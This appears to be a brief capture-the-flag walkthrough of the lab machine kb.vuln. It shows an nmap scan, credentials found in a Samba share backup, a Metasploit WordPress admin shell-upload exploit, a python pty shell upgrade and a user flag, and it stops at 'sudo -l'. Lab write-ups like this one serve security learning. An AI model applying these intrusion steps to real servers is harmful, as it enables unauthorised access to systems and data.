#Make sure that add machine address into hosts file.
$nmap -sV kb.vuln Nmap scan report for kb.vuln (192.168.1.6) Host is up (0.00031s latency). Not shown: 995 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) Service Info: Host: UBUNTU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
tried anonymous login with ftp but doesn’t work, port 80 also open so run dirb and got following result.
tried bruteforce to wordpress login, but no luck then notice Samba service and dig into it smb://kb.vuln and got username and password into backup.zip contain remerber_me.txt
where got credentials can try different ways to upload backdoor, here is one of the simplest way to upload shell using metasploit-framework.
msf> use exploit/unix/webapp/wp_admin_shell_upload msf> show options msf> set rhosts kb.vuln //set all the required options msf> run
got shell..! so first flag kbadmin folder able to read using www-data user, as well as we already have credentials of kbadmin:MachineBoy141
use python tty python -c ‘import pty; pty.spawn(“/bin/sh”)’ cd /home/kbadmin and got user flag
for root simply tried sudo -l